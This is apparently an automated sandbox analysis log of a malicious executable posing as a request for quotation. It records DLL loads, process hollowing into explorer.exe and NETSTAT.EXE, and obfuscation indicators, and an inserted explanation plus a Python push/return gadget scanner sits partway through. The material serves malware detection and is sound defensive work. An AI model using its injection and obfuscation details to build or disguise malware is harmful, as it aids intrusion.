Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: snmpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\RFQ 245801.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ 245801.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ 245801.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: RFQ 245801.exe, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.5370000.3.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.2b5f4a8.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 6.2.explorer.exe.1120f840.0.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 7.2.NETSTAT.EXE.35ef840.3.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0E75 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0D50 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416825 push ecx; iretd 5_2_00416829
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_004168EA push ecx; ret 5_2_004168F6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417116 push ss; iretd 5_2_00417118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417132 push ecx; iretd 5_2_00417133
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041E9B2 push edx; iretd 5_2_0041E9B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041EA0C push 6B25699Fh; iretd 5_2_0041EA11
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416B3D push ds; retf 5_2_00416B4E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0040A47D pushad ; ret 5_2_0040A47E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4DB push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D53C push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F225F pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F27FA pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx 5_2_017209B6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F283D push eax; iretd 5_2_016F2858
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB02 push esp; retn 0000h 6_2_0F6FAB03
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB1E push esp; retn 0000h 6_2_0F6FAB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FA9B5 push esp; retn 0000h 6_2_0F6FAAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBAB9B5 push esp; retn 0000h 6_2_0FBABAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB1E push esp; retn 0000h 6_2_0FBABB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB02 push esp; retn 0000h 6_2_0FBABB03
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_006460DD push ecx; ret 7_2_006460F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D09AD push ecx; mov dword ptr [esp], ecx 7_2_030D09B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7132 push ecx; iretd 7_2_026B7133
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7116 push ss; iretd 7_2_026B7118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026AA47D pushad ; ret 7_2_026AA47E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BD4DB push eax; ret 7_2_026BD542
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BD4D2 push eax; ret 7_2_026BD4D8
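The "Code function" lines above each pair a push with the return that directly follows it: push ecx; iretd, push ss; iretd, push 6B25699Fh; iretd, push ds; retf, pushad; ret and, in explorer.exe, push esp; retn 0000h. Compiled code tears down a frame before a return rather than pushing a register or an immediate into it, so a push/ret pair behaves as an indirect jump to whatever was pushed and is reported as an obfuscation indicator. Note also that the same offsets (0x7116, 0x7132, 0xA47D, 0xD4D2, 0xD4DB) appear at base 0x0040xxxx in process 5 (the hollowed RFQ 245801.exe) and at 0x026Bxxxx in process 7 (NETSTAT.EXE), which shows the identical injected image mapped into both hosts. The scanner below is an added example, not part of the report: a linear byte scan that finds these encodings in a buffer and prints them in the report's mnemonic form. The sample buffer is constructed from the sequences listed above, and the opcode table is limited to the 32-bit push and return forms those lines use.

```python
# Single-byte pushes and the return forms that the "push; ret" heuristic pairs
# them with. Opcode values are the 32-bit encodings from the Intel SDM.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEG_PUSH = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}


def decode_push(buf, i):
    """Return (mnemonic, length) if buf[i:] starts with a push, else None."""
    b = buf[i]
    if 0x50 <= b <= 0x57:
        return f"push {REG32[b - 0x50]}", 1
    if b in SEG_PUSH:
        return f"push {SEG_PUSH[b]}", 1
    if b == 0x60:
        return "pushad", 1
    if b == 0x9C:
        return "pushfd", 1
    if b == 0x68 and i + 5 <= len(buf):                 # push imm32
        return f"push {int.from_bytes(buf[i + 1:i + 5], 'little'):08X}h", 5
    if b == 0x6A and i + 2 <= len(buf):                 # push imm8
        return f"push {buf[i + 1]:02X}h", 2
    return None


def decode_ret(buf, i):
    """Return (mnemonic, length) if buf[i:] starts with a near/far return or iretd."""
    if i >= len(buf):
        return None
    b = buf[i]
    if b == 0xC3:
        return "ret", 1
    if b == 0xCB:
        return "retf", 1
    if b == 0xCF:
        return "iretd", 1
    if b in (0xC2, 0xCA) and i + 3 <= len(buf):        # retn/retf imm16
        name = "retn" if b == 0xC2 else "retf"
        return f"{name} {int.from_bytes(buf[i + 1:i + 3], 'little'):04X}h", 3
    return None


def find_push_ret_gadgets(buf, base=0):
    """Linear scan for a push immediately followed by a return.

    This is a byte-pattern scan, not a disassembler: like the sandbox heuristic it
    also fires on data bytes and on the tail of longer instructions, so a hit is a
    place to look, not proof of obfuscation on its own."""
    hits = []
    for i in range(len(buf)):
        push = decode_push(buf, i)
        if push is None:
            continue
        ret = decode_ret(buf, i + push[1])
        if ret is not None:
            hits.append((base + i, f"{push[0]}; {ret[0]}"))
    return hits


# Constructed buffer built from the sequences the report lists, with an ordinary
# prologue and a plain "xor eax, eax; ret" epilogue that must not be flagged.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp
    0x51, 0xCF,                          # push ecx; iretd
    0x90, 0x90,                          # nop; nop
    0x16, 0xCF,                          # push ss; iretd
    0x68, 0x9F, 0x69, 0x25, 0x6B, 0xCF,  # push 6B25699Fh; iretd
    0x1E, 0xCB,                          # push ds; retf
    0x60, 0xC3,                          # pushad; ret
    0x54, 0xC2, 0x00, 0x00,              # push esp; retn 0000h
    0x9C, 0xCF,                          # pushfd; iretd
    0x33, 0xC0, 0xC3,                    # xor eax, eax; ret
])

if __name__ == "__main__":
    for addr, text in find_push_ret_gadgets(SAMPLE, base=0x00416000):
        print(f"{addr:08X} {text}")
```

Run the same scan over the raw section bytes of the unpacked image at the two bases above and the hit lists should line up offset for offset, which is a quick way to confirm that two memory dumps hold the same payload without diffing them byte by byte.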
Source: RFQ 245801.exe Static PE information: section name: .text entropy: 7.932697234212169
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
